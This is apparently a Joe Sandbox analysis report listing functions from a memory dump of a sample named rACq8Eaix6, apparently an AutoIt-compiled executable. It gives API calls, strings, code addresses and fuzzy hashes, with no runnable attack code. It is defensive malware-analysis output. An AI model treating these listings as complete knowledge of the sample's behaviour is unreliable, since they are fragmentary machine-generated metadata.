Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: LogonUser
String ID:
API String ID: 1244722697-0
Opcode ID: d0318504a10e42a2a111ea4ab7e9044321a21d4ba713e79a7cfc819460b398eb
Instruction ID: 9330fb07180b94fd4851712fe6bb1593275c7dd35e8690cd85757f253505fb53
Opcode Fuzzy Hash: d0318504a10e42a2a111ea4ab7e9044321a21d4ba713e79a7cfc819460b398eb
Instruction Fuzzy Hash: 99D05E3226060EABEF018EA4DC01EAE3B69EB04B01F408111FE15D50A1C775D835AB60

Function 00BFA124 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?), ref: 00BFA12A

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: cedb7377260c6f3b99ecf1d7a9d421c158009dec2dd74b51d7b8f5dd967f800f
Instruction ID: a78737f5c5a84b498c5fbe797b607151aaffed61934099ba7cabbac7203130e2
Opcode Fuzzy Hash: cedb7377260c6f3b99ecf1d7a9d421c158009dec2dd74b51d7b8f5dd967f800f
Instruction Fuzzy Hash: 47A0113000020CAB8A002F82EC08A88BFACEA002A2B008020F80C800328B32A8A28A80

Function 00BE8808 Relevance: .6, Instructions: 590COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ea0028f191ec9d91d6d1553360afc31340083468c172966dba387bae42f7cee
Instruction ID: 72a25fd0a463e96fe34454295ef53d8aa2d0ca965b59e74c28f24bd8b195c1b0
Opcode Fuzzy Hash: 6ea0028f191ec9d91d6d1553360afc31340083468c172966dba387bae42f7cee
Instruction Fuzzy Hash: 17225730904DA6CBDF388B66E49477DB7E1FF00304F2890ABD95A8B992DB709D91D781

Function 00BF21C5 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction ID: 0b239588f52481c4953aab5cad986cb9168da506df78b065843d7ae30bc58c4e
Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction Fuzzy Hash: 8DC185362050974ADF2D473E847503EFAE19EA27B131A0BEDD9B2CB1D4EE20C92DD610

Function 00BF25FA Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction ID: f668f168f356b24a8f00802e940178ddf0b4c66a2a14427463c9ed8929a255ae
Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction Fuzzy Hash: 8BC17F362051974ADF2D473EC47413EBAE19EA27B131A0BEDD5B2DB1D4EE20C92DD620

Function 00BF1978 Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction ID: 8b740f04caefd55d47d24179a3aadcbe290159c4e76ea2edfa56918896faddd1
Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction Fuzzy Hash: DDC1713620519789DF2D463E847413EBAE1DEA27B131A0FEDD5B2CB1C5EE20C92D9620

Function 0181901F Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2096230854.0000000001819000.00000040.00000020.00020000.00000000.sdmp, Offset: 01819000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1819000_rACq8Eaix6.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9bf903803309d1bbdf52b4e90d8000a524d034423d0958980ad54cc602e66576
Instruction ID: 9f59b83a51a182678dade842f422b24df534fe804b997dddb99d61612ce64c63
Opcode Fuzzy Hash: 9bf903803309d1bbdf52b4e90d8000a524d034423d0958980ad54cc602e66576
Instruction Fuzzy Hash: 3741FB7180E3868FC742CF6CC9984857FE0EE027683A949DFC0948F467D626A51BDB56

Function 0181CA20 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2096230854.0000000001819000.00000040.00000020.00020000.00000000.sdmp, Offset: 01819000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1819000_rACq8Eaix6.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction ID: baf877c96832e067412228f84c8b83b23c169edec66d746588bb53750fb3dd43
Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction Fuzzy Hash: 8641D5B1D1051CDBCF48CFADC991AEEBBF1AF88201F548299D516AB345D730AB41DB40

Function 0181C910 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2096230854.0000000001819000.00000040.00000020.00020000.00000000.sdmp, Offset: 01819000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1819000_rACq8Eaix6.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction ID: 7708f3ea5456454707041605064e16dce0226d33f60b951078aa048a089d327b
Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction Fuzzy Hash: 0A019279A00109EFCB45DF98C5909AEF7BAFB48310F208699D819E7345D730AE41DB84

Function 0181C8B0 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2096230854.0000000001819000.00000040.00000020.00020000.00000000.sdmp, Offset: 01819000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1819000_rACq8Eaix6.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction ID: 4ed107dd1d4a7c47ba1d798987470b07df3b3187dc486d61e7dc69e51eedd1e0
Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction Fuzzy Hash: B5018079A40209EFCB44DF98C5909AEF7B9FB48310B208599D819A7705D730AE41DB80

Function 0181B280 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2096230854.0000000001819000.00000040.00000020.00020000.00000000.sdmp, Offset: 01819000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1819000_rACq8Eaix6.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48

Function 00C47806 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00C4785B
DeleteObject.GDI32(00000000), ref: 00C4786D
DestroyWindow.USER32 ref: 00C4787B
GetDesktopWindow.USER32 ref: 00C47895
GetWindowRect.USER32(00000000), ref: 00C4789C
SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00C479DD
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00C479ED
CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C47A35
GetClientRect.USER32(00000000,?), ref: 00C47A41
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00C47A7B
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C47A9D
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C47AB0
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C47ABB
GlobalLock.KERNEL32(00000000), ref: 00C47AC4
ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C47AD3
GlobalUnlock.KERNEL32(00000000), ref: 00C47ADC
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C47AE3
GlobalFree.KERNEL32(00000000), ref: 00C47AEE
CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C47B00
OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00C62CAC,00000000), ref: 00C47B16
GlobalFree.KERNEL32(00000000), ref: 00C47B26
CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00C47B4C
SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00C47B6B
SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C47B8D
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C47D7A

Strings

DISPLAY, xrefs: 00C47BDD
AutoIt v3, xrefs: 00C47A2D
, xrefs: 00C47D00
static, xrefs: 00C47A75, 00C47BCC

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: 0483914c9662ade8d3e975aa08a180c2df0a1a6eb303225bec258eae33cad42b
Instruction ID: 4b6ed92fdb0c7ef6a3fc3ff1cfbe249e3f73a373a8e0c6740703417e652c4ef6
Opcode Fuzzy Hash: 0483914c9662ade8d3e975aa08a180c2df0a1a6eb303225bec258eae33cad42b
Instruction Fuzzy Hash: FF027C75900605AFDB14DFA4DC89FAEBBB9FF48311F008259F915AB2A1DB309D42CB60

Function 00C5356B Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,00C5F910), ref: 00C53627
IsWindowVisible.USER32(?), ref: 00C5364B

Strings

DELSTRING, xrefs: 00C53749
TABRIGHT, xrefs: 00C5369D
SELECTSTRING, xrefs: 00C53806
CHECK, xrefs: 00C5386D
ISENABLED, xrefs: 00C5366B
FINDSTRING, xrefs: 00C53776
GETLINECOUNT, xrefs: 00C538C6
SENDCOMMANDID, xrefs: 00C539DA
GETCURRENTLINE, xrefs: 00C538ED
ISCHECKED, xrefs: 00C53839
GETCURRENTCOL, xrefs: 00C53928
EDITPASTE, xrefs: 00C5395F
ADDSTRING, xrefs: 00C53716
ISVISIBLE, xrefs: 00C53637
GETLINE, xrefs: 00C5399B
HIDEDROPDOWN, xrefs: 00C53700
UNCHECK, xrefs: 00C53883
SETCURRENTSELECTION, xrefs: 00C537B6
CURRENTTAB, xrefs: 00C536BD
GETSELECTED, xrefs: 00C538A3
GETCURRENTSELECTION, xrefs: 00C537E3
TABLEFT, xrefs: 00C53687
SHOWDROPDOWN, xrefs: 00C536E0

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: BuffCharUpperVisibleWindow
String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
API String ID: 4105515805-45149045
Opcode ID: 9b74c57f555e3657530e83525930cbd375e2b00b7c7d59c558c355aa5c08a0b9
Instruction ID: 89e3376ea8a84616151ec9fe8516bdc89c1854e361a42af98f5d3d715a8d9a96
Opcode Fuzzy Hash: 9b74c57f555e3657530e83525930cbd375e2b00b7c7d59c558c355aa5c08a0b9
Instruction Fuzzy Hash: 0ED18B782047419BCB04EF11C951A6EB7E1AF94385F0444A9FC925B3A3DB31EE8EDB49

Function 00C5A5DA Relevance: 49.8, APIs: 33, Instructions: 260COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 00C5A630
GetSysColorBrush.USER32(0000000F), ref: 00C5A661
GetSysColor.USER32(0000000F), ref: 00C5A66D
SetBkColor.GDI32(?,000000FF), ref: 00C5A687
SelectObject.GDI32(?,00000000), ref: 00C5A696
InflateRect.USER32(?,000000FF,000000FF), ref: 00C5A6C1
GetSysColor.USER32(00000010), ref: 00C5A6C9
CreateSolidBrush.GDI32(00000000), ref: 00C5A6D0
FrameRect.USER32(?,?,00000000), ref: 00C5A6DF
DeleteObject.GDI32(00000000), ref: 00C5A6E6
InflateRect.USER32(?,000000FE,000000FE), ref: 00C5A731
FillRect.USER32(?,?,00000000), ref: 00C5A763
GetWindowLongW.USER32(?,000000F0), ref: 00C5A78E

Part of subcall function 00C5A8CA: GetSysColor.USER32(00000012), ref: 00C5A903
Part of subcall function 00C5A8CA: SetTextColor.GDI32(?,?), ref: 00C5A907
Part of subcall function 00C5A8CA: GetSysColorBrush.USER32(0000000F), ref: 00C5A91D
Part of subcall function 00C5A8CA: GetSysColor.USER32(0000000F), ref: 00C5A928
Part of subcall function 00C5A8CA: GetSysColor.USER32(00000011), ref: 00C5A945
Part of subcall function 00C5A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00C5A953
Part of subcall function 00C5A8CA: SelectObject.GDI32(?,00000000), ref: 00C5A964
Part of subcall function 00C5A8CA: SetBkColor.GDI32(?,00000000), ref: 00C5A96D
Part of subcall function 00C5A8CA: SelectObject.GDI32(?,?), ref: 00C5A97A
Part of subcall function 00C5A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 00C5A999
Part of subcall function 00C5A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00C5A9B0
Part of subcall function 00C5A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 00C5A9C5
Part of subcall function 00C5A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00C5A9ED

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
String ID:
API String ID: 3521893082-0
Opcode ID: c533e4ba002a14ceed482dc71df8a576ab808bdd6cfa38b6b2e47c51561da79f
Instruction ID: bd97f4879f3688f899302968cd84f15fde212b15b99d3bf94b0a60aad0b42f2d
Opcode Fuzzy Hash: c533e4ba002a14ceed482dc71df8a576ab808bdd6cfa38b6b2e47c51561da79f
Instruction Fuzzy Hash: 4C918D76008305AFC7149F65DC08B5F7BA9FB88322F540B2DF962A61E1D770D985CB52

Function 00BD2C18 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?), ref: 00BD2CA2
DeleteObject.GDI32(00000000), ref: 00BD2CE8
DeleteObject.GDI32(00000000), ref: 00BD2CF3
DestroyIcon.USER32(00000000,?,?,?), ref: 00BD2CFE
DestroyWindow.USER32(00000000,?,?,?), ref: 00BD2D09
SendMessageW.USER32(?,00001308,?,00000000), ref: 00C0C43B
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00C0C474
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00C0C89D

Part of subcall function 00BD1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00BD2036,?,00000000,?,?,?,?,00BD16CB,00000000,?), ref: 00BD1B9A

SendMessageW.USER32(?,00001053), ref: 00C0C8DA
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00C0C8F1
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00C0C907
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00C0C912

Strings

0, xrefs: 00C0C731

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
String ID: 0
API String ID: 464785882-4108050209
Opcode ID: c875e26cea4b0feb56237adabe391030c7d3f66c015319efa18a72e20961dd19
Instruction ID: f46fe3f844e91e49510dbfb1cef8a6bb69d53632761b113b4604c70d73910b7d
Opcode Fuzzy Hash: c875e26cea4b0feb56237adabe391030c7d3f66c015319efa18a72e20961dd19
Instruction Fuzzy Hash: 78129E341002419FDB25CF24C8C4BA9B7E1FF54301F5846AAF955DB2A2D731ED82DB91

Function 00C474AB Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 00C474DE
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00C4759D
SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00C475DB
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00C475ED
CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00C47633
GetClientRect.USER32(00000000,?), ref: 00C4763F
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00C47683
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00C47692
GetStockObject.GDI32(00000011), ref: 00C476A2
SelectObject.GDI32(00000000,00000000), ref: 00C476A6
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00C476B6
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C476BF
DeleteDC.GDI32(00000000), ref: 00C476C8
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00C476F4
SendMessageW.USER32(00000030,00000000,00000001), ref: 00C4770B
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00C47746
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00C4775A
SendMessageW.USER32(00000404,00000001,00000000), ref: 00C4776B
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00C4779B
GetStockObject.GDI32(00000011), ref: 00C477A6
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00C477B1
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00C477BB

Strings

DISPLAY, xrefs: 00C47688
AutoIt v3, xrefs: 00C4762B
msctls_progress32, xrefs: 00C4773C
static, xrefs: 00C4767D, 00C47795

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: 847079f93e9a5d47b3064e4827bc00336bbf24e580de23d8a540c3591a22a3bf
Instruction ID: e2edb40adec6adeda13d114b6af2ae319835ec9d30f70713c37621ffbcf0288a
Opcode Fuzzy Hash: 847079f93e9a5d47b3064e4827bc00336bbf24e580de23d8a540c3591a22a3bf
Instruction Fuzzy Hash: BEA182B5A00605BFEB14DBA4DC4AFAFBBB9EB04711F004219FA14A72E0D770AD41CB64

Function 00C3AD10 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00C3AD1E
GetDriveTypeW.KERNEL32(?,00C5FAC0,?,\\.\,00C5F910), ref: 00C3ADFB
SetErrorMode.KERNEL32(00000000,00C5FAC0,?,\\.\,00C5F910), ref: 00C3AF59

Strings

1394, xrefs: 00C3AEDB
SATA, xrefs: 00C3AF0C
ATA, xrefs: 00C3AED4
PhysicalDrive, xrefs: 00C3ADA7
SAS, xrefs: 00C3AF05
Removable, xrefs: 00C3AE4D
RAID, xrefs: 00C3AEF7
Virtual, xrefs: 00C3AF21
Unknown, xrefs: 00C3AE1B, 00C3AEBF
ATAPI, xrefs: 00C3AECD
CDROM, xrefs: 00C3AE2F
USB, xrefs: 00C3AEF0
RAMDisk, xrefs: 00C3AE25
SCSI, xrefs: 00C3AEC6
\\.\, xrefs: 00C3AD70
SSA, xrefs: 00C3AEE2
Fixed, xrefs: 00C3AE43
Network, xrefs: 00C3AE39
iSCSI, xrefs: 00C3AEFE
FileBackedVirtual, xrefs: 00C3AF28
Fibre, xrefs: 00C3AEE9
MMC, xrefs: 00C3AF1A
SSD, xrefs: 00C3AE86

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
